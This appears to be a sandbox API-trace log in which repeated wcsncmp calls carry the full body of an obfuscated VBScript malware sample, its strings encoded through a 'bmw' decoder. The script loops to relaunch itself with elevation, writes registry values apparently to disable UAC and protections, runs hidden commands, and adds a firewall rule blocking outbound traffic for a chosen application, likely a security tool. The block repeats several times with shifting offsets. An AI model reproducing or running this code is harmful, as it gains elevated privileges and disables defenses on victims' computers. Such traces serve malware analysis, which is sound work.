CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.320] wcsncmp (_String1=",str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.321] wcsncmp (_String1="str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.321] wcsncmp (_String1="tr2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.321] wcsncmp (_String1="r2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.321] wcsncmp (_String1="2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite 